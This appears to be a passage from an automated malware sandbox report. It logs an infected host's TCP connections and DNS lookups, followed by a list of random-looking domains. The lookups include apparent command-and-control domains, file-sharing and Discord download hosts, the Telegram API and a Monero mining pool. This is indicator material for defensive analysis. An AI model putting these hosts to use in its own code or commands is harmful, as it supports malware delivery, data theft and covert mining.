Jan 14, 2022 13:58:54.017983913 CET  80           49776      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:54.018285036 CET  49776        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:54.018491983 CET  49776        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:54.018687010 CET  49776        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:54.036034107 CET  80           49776      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:54.036067009 CET  80           49776      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:54.137383938 CET  80           49776      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:54.137490034 CET  49776        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:54.137804031 CET  49776        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:54.155479908 CET  80           49776      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:54.440464973 CET  49777        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:54.457777023 CET  80           49777      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:54.457951069 CET  49777        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:54.458961010 CET  49777        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:54.458983898 CET  49777        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:54.476219893 CET  80           49777      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:54.579741955 CET  80           49777      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:54.579868078 CET  49777        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:54.580240965 CET  49777        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:54.599031925 CET  80           49777      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:55.028954983 CET  49778        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:55.046314955 CET  80           49778      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:55.046483994 CET  49778        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:55.046607018 CET  49778        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:55.046617985 CET  49778        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:55.063810110 CET  80           49778      8.209.70.0   192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.166625977 CET80497788.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.166662931 CET80497788.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.166717052 CET4977880192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.166989088 CET4977880192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.184209108 CET80497788.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.197638035 CET4977980192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.214900017 CET80497798.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.215178013 CET4977980192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.215187073 CET4977980192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.215615988 CET4977980192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.232429981 CET80497798.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.232738018 CET80497798.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.333425999 CET80497798.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.333884001 CET4977980192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.333910942 CET4977980192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.351144075 CET80497798.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.370124102 CET4978080192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.387273073 CET80497808.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.387356997 CET4978080192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.387542963 CET4978080192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.387581110 CET4978080192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.421509981 CET80497808.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.421547890 CET80497808.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.508378029 CET80497808.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.508536100 CET4978080192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.508923054 CET4978080192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.520525932 CET4978180192.168.2.3185.186.142.166
                                                                                                            Jan 14, 2022 13:58:55.526056051 CET80497808.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.576786041 CET8049781185.186.142.166192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.081492901 CET4978180192.168.2.3185.186.142.166
                                                                                                            Jan 14, 2022 13:58:56.137991905 CET8049781185.186.142.166192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.643996000 CET4978180192.168.2.3185.186.142.166
                                                                                                            Jan 14, 2022 13:58:56.701874971 CET8049781185.186.142.166192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.769278049 CET4978280192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.786422014 CET80497828.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.786525011 CET4978280192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.786631107 CET4978280192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.786664009 CET4978280192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.803860903 CET80497828.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.906481981 CET80497828.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.906631947 CET4978280192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.906946898 CET4978280192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.925153971 CET80497828.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.935576916 CET4978380192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.954091072 CET80497838.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.954193115 CET4978380192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.954328060 CET4978380192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.954360962 CET4978380192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.971613884 CET80497838.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:57.071717024 CET80497838.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:57.071855068 CET4978380192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:57.072341919 CET4978380192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:57.091332912 CET80497838.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:57.438575983 CET4978480192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:59:00.441234112 CET4978480192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:59:00.458499908 CET80497848.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:59:00.459135056 CET4978480192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:59:00.459331989 CET4978480192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:59:00.517858982 CET80497848.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:59:00.561033964 CET80497848.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:59:00.561052084 CET80497848.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:59:00.561069012 CET80497848.209.70.0192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2022 13:58:53.545952082 CET | 8.8.8.8 | 192.168.2.3 | 0x3c03 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:58:53.998173952 CET | 8.8.8.8 | 192.168.2.3 | 0x59ae | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:58:54.439436913 CET | 8.8.8.8 | 192.168.2.3 | 0xeea9 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:58:55.028279066 CET | 8.8.8.8 | 192.168.2.3 | 0xc87a | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:58:55.195472002 CET | 8.8.8.8 | 192.168.2.3 | 0x3339 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:58:55.369292974 CET | 8.8.8.8 | 192.168.2.3 | 0xc30c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:58:56.768579960 CET | 8.8.8.8 | 192.168.2.3 | 0xe92a | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:58:56.934833050 CET | 8.8.8.8 | 192.168.2.3 | 0x406d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:58:57.437783957 CET | 8.8.8.8 | 192.168.2.3 | 0x5486 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:02.003447056 CET | 8.8.8.8 | 192.168.2.3 | 0x377b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:02.245398045 CET | 8.8.8.8 | 192.168.2.3 | 0xd52e | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:02.514441013 CET | 8.8.8.8 | 192.168.2.3 | 0xd9b2 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:03.635468006 CET | 8.8.8.8 | 192.168.2.3 | 0x5a92 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:04.165971994 CET | 8.8.8.8 | 192.168.2.3 | 0xae9f | No error (0) | privacy-tools-for-you-780.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:05.566719055 CET | 8.8.8.8 | 192.168.2.3 | 0xae9f | No error (0) | privacy-tools-for-you-780.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:06.997880936 CET | 8.8.8.8 | 192.168.2.3 | 0x8c4b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:07.170008898 CET | 8.8.8.8 | 192.168.2.3 | 0x3c08 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:07.429474115 CET | 8.8.8.8 | 192.168.2.3 | 0x96d9 | No error (0) | unicupload.top | | 54.38.220.85 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:07.567471981 CET | 8.8.8.8 | 192.168.2.3 | 0xa642 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:07.734281063 CET | 8.8.8.8 | 192.168.2.3 | 0x16f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:07.899265051 CET | 8.8.8.8 | 192.168.2.3 | 0x6064 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:08.065099001 CET | 8.8.8.8 | 192.168.2.3 | 0x5295 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:08.233400106 CET | 8.8.8.8 | 192.168.2.3 | 0x8ac3 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:10.087042093 CET | 8.8.8.8 | 192.168.2.3 | 0xd7ba | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:10.696794987 CET | 8.8.8.8 | 192.168.2.3 | 0xa8db | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:11.195509911 CET | 8.8.8.8 | 192.168.2.3 | 0x4cf2 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:11.408962011 CET | 8.8.8.8 | 192.168.2.3 | 0x6d73 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:13.593172073 CET | 8.8.8.8 | 192.168.2.3 | 0x78d9 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:13.761769056 CET | 8.8.8.8 | 192.168.2.3 | 0x527e | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:13.925363064 CET | 8.8.8.8 | 192.168.2.3 | 0xfcd7 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:14.143767118 CET | 8.8.8.8 | 192.168.2.3 | 0x439e | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:14.143767118 CET | 8.8.8.8 | 192.168.2.3 | 0x439e | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:14.143767118 CET | 8.8.8.8 | 192.168.2.3 | 0x439e | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:14.143767118 CET | 8.8.8.8 | 192.168.2.3 | 0x439e | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:14.143767118 CET | 8.8.8.8 | 192.168.2.3 | 0x439e | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:18.034032106 CET | 8.8.8.8 | 192.168.2.3 | 0xdc8 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:18.241882086 CET | 8.8.8.8 | 192.168.2.3 | 0x13b1 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:18.452987909 CET | 8.8.8.8 | 192.168.2.3 | 0x3ba6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:40.005820990 CET | 8.8.8.8 | 192.168.2.3 | 0xad11 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:40.588044882 CET | 8.8.8.8 | 192.168.2.3 | 0xa2f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:40.819777966 CET | 8.8.8.8 | 192.168.2.3 | 0x522f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:42.217735052 CET | 8.8.8.8 | 192.168.2.3 | 0xe169 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:42.407866955 CET | 8.8.8.8 | 192.168.2.3 | 0x2944 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:42.620006084 CET | 8.8.8.8 | 192.168.2.3 | 0x5775 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:42.810046911 CET | 8.8.8.8 | 192.168.2.3 | 0x98e8 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:43.003878117 CET | 8.8.8.8 | 192.168.2.3 | 0xf863 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:43.271547079 CET | 8.8.8.8 | 192.168.2.3 | 0x1351 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:43.465672970 CET | 8.8.8.8 | 192.168.2.3 | 0x8c40 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:43.776849985 CET | 8.8.8.8 | 192.168.2.3 | 0x609f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:44.088958025 CET | 8.8.8.8 | 192.168.2.3 | 0x5705 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:44.563781977 CET | 8.8.8.8 | 192.168.2.3 | 0x752b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:45.022387981 CET | 8.8.8.8 | 192.168.2.3 | 0x4bfb | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:46.535403967 CET | 8.8.8.8 | 192.168.2.3 | 0x8865 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:46.729526043 CET | 8.8.8.8 | 192.168.2.3 | 0xcff2 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:47.132339954 CET | 8.8.8.8 | 192.168.2.3 | 0xdf5f | No error (0) | goo.su | | 172.67.139.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:47.132339954 CET | 8.8.8.8 | 192.168.2.3 | 0xdf5f | No error (0) | goo.su | | 104.21.38.221 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:47.702605963 CET | 8.8.8.8 | 192.168.2.3 | 0x8325 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:47.877559900 CET | 8.8.8.8 | 192.168.2.3 | 0x492a | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:48.061381102 CET | 8.8.8.8 | 192.168.2.3 | 0x852d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:48.312066078 CET | 8.8.8.8 | 192.168.2.3 | 0x6f9e | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:48.482312918 CET | 8.8.8.8 | 192.168.2.3 | 0x8624 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:48.713406086 CET | 8.8.8.8 | 192.168.2.3 | 0xec81 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:48.996695042 CET | 8.8.8.8 | 192.168.2.3 | 0xeef8 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:50.326821089 CET | 8.8.8.8 | 192.168.2.3 | 0x2db8 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:50.528990984 CET | 8.8.8.8 | 192.168.2.3 | 0x8e7b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:52.363843918 CET | 8.8.8.8 | 192.168.2.3 | 0xc02a | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:52.786081076 CET | 8.8.8.8 | 192.168.2.3 | 0xc0f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:53.010150909 CET | 8.8.8.8 | 192.168.2.3 | 0xe6a3 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:53.405926943 CET | 8.8.8.8 | 192.168.2.3 | 0x43c6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:53.907783985 CET | 8.8.8.8 | 192.168.2.3 | 0x4d58 | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:57.344748974 CET | 8.8.8.8 | 192.168.2.3 | 0x35ab | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:57.514636993 CET | 8.8.8.8 | 192.168.2.3 | 0x27c5 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:59.385862112 CET | 8.8.8.8 | 192.168.2.3 | 0x905a | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 13:59:59.555340052 CET | 8.8.8.8 | 192.168.2.3 | 0x905a | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:04.096995115 CET | 8.8.8.8 | 192.168.2.3 | 0x9da2 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:04.096995115 CET | 8.8.8.8 | 192.168.2.3 | 0x9da2 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:04.096995115 CET | 8.8.8.8 | 192.168.2.3 | 0x9da2 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:04.096995115 CET | 8.8.8.8 | 192.168.2.3 | 0x9da2 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:04.096995115 CET | 8.8.8.8 | 192.168.2.3 | 0x9da2 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:04.636590958 CET | 8.8.8.8 | 192.168.2.3 | 0xa04d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:04.946705103 CET | 8.8.8.8 | 192.168.2.3 | 0xcc76 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:05.298472881 CET | 8.8.8.8 | 192.168.2.3 | 0xe601 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:10.144378901 CET | 8.8.8.8 | 192.168.2.3 | 0x4a2b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:10.661026955 CET | 8.8.8.8 | 192.168.2.3 | 0xe07f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:12.891941071 CET | 8.8.8.8 | 192.168.2.3 | 0x79eb | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:13.590600967 CET | 8.8.8.8 | 192.168.2.3 | 0xd5a6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:13.892220020 CET | 8.8.8.8 | 192.168.2.3 | 0x563 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:14.104923964 CET | 8.8.8.8 | 192.168.2.3 | 0xc4f5 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:14.323115110 CET | 8.8.8.8 | 192.168.2.3 | 0xb39c | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:14.323115110 CET | 8.8.8.8 | 192.168.2.3 | 0xb39c | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:14.323115110 CET | 8.8.8.8 | 192.168.2.3 | 0xb39c | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:14.323115110 CET | 8.8.8.8 | 192.168.2.3 | 0xb39c | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:14.323115110 CET | 8.8.8.8 | 192.168.2.3 | 0xb39c | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:16.315987110 CET | 8.8.8.8 | 192.168.2.3 | 0x4af4 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:17.113708973 CET | 8.8.8.8 | 192.168.2.3 | 0x75b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:18.030103922 CET | 8.8.8.8 | 192.168.2.3 | 0x1eb9 | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:20.665946960 CET | 8.8.8.8 | 192.168.2.3 | 0xbd42 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:20.665946960 CET | 8.8.8.8 | 192.168.2.3 | 0xbd42 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:20.665946960 CET | 8.8.8.8 | 192.168.2.3 | 0xbd42 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:20.665946960 CET | 8.8.8.8 | 192.168.2.3 | 0xbd42 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:20.665946960 CET | 8.8.8.8 | 192.168.2.3 | 0xbd42 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:22.436964989 CET | 8.8.8.8 | 192.168.2.3 | 0x892b | No error (0) | pool.supportxmr.com | pool-fr.supportxmr.com | | CNAME (Canonical name) | IN (0x0001)
Jan 14, 2022 14:00:22.436964989 CET | 8.8.8.8 | 192.168.2.3 | 0x892b | No error (0) | pool-fr.supportxmr.com | | 37.187.95.110 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:22.436964989 CET | 8.8.8.8 | 192.168.2.3 | 0x892b | No error (0) | pool-fr.supportxmr.com | | 91.121.140.167 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:22.436964989 CET | 8.8.8.8 | 192.168.2.3 | 0x892b | No error (0) | pool-fr.supportxmr.com | | 149.202.83.171 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:22.436964989 CET | 8.8.8.8 | 192.168.2.3 | 0x892b | No error (0) | pool-fr.supportxmr.com | | 94.23.247.226 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:22.436964989 CET | 8.8.8.8 | 192.168.2.3 | 0x892b | No error (0) | pool-fr.supportxmr.com | | 94.23.23.52 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:31.169972897 CET | 8.8.8.8 | 192.168.2.3 | 0x69a2 | No error (0) | a0621686.xsph.ru | | 141.8.192.193 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:38.257224083 CET | 8.8.8.8 | 192.168.2.3 | 0xa2ef | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 14:00:43.675483942 CET | 8.8.8.8 | 192.168.2.3 | 0x7572 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• doekvpclh.net
  • host-data-coin-11.com
• cfaivcludy.net
• ydoois.net
• jpiiaqw.org
• aoblnua.org
• riacbys.net
• elxvnyxk.com
• mcvlfhw.net
• data-host-coin-8.com
• wrbmaiqv.net
• wqgqp.com
• fenydm.net
• firfcooyt.net
• privacy-tools-for-you-780.com
• rwudvrtrt.net
• omhff.net
• unicupload.top
• fbfbuopuh.org
• fdhmpp.org
• yyvmhh.org
• carudedeao.net
• ihkfjyj.org
• sqcnkaq.com
• nbxmbl.org
• ecbfled.com
• 185.7.214.171:8080
• emncntmtow.net
• qsefotqodc.org
• mbnpyehjf.org
• pehjgpd.org
• vpoejhbse.org
• xemsp.com
• juqsasu.org
• vmgenst.org
• bfkxhfurw.com
• jldaqud.net
• yoawoahu.org
• ulvvu.com
• jndibx.com
• aifro.com
• awvcsqp.com
• hsqarkq.org
• ucyfot.org
• xjtksbsy.com
• ppqljylf.org
• fxxlivvp.net
• kkdbsrky.com
• deegamxl.com
• xcxiyncehq.org
